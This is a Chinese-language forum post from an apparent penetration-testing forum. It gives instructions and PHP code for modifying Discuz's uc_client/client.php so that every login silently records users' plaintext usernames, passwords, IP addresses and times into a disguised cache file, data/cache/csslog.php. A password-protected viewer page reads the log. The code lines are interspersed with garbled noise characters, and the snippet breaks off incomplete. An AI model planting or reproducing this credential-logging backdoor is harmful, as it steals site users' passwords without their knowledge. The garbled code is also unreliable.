中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]
作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在2 G( p+ w$ m' M3 `: z+ {- ]5 F  G
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
% j7 G6 H: @& d( M3 Q2 D下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
' _/ q/ ^, w+ o# W你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
! H5 p& i. _" O+ D: t& L" g  vif(getenv('HTTP_CLIENT_IP')) { * V3 `; a+ u3 U7 R: X
$onlineip = getenv('HTTP_CLIENT_IP');$ n& E- ~2 G0 N; F- f; U* i
} elseif(getenv('HTTP_X_FORWARDED_FOR')) { 6 ^5 p/ X$ b6 i9 o& m# t$ c
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
7 b) @# d8 k" ]* |: V- A1 q& Z} elseif(getenv('REMOTE_ADDR')) { " ~- N, x& r7 O8 q2 K+ ~
$onlineip = getenv('REMOTE_ADDR');
- f8 T8 u$ R( ~3 A0 U} else { 9 d- l3 e% _5 r
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
/ t# @# N$ E3 h; J}7 c+ c! s, u  d( ^) ?& }$ S
     $showtime=date("Y-m-d H:i:s");
. }5 Q" |0 T+ C- h    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
( N  @/ M- ^4 B" e    $handle=fopen('./data/cache/csslog.php','a+');: R7 M# V' ]2 I2 ^9 p8 \
    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2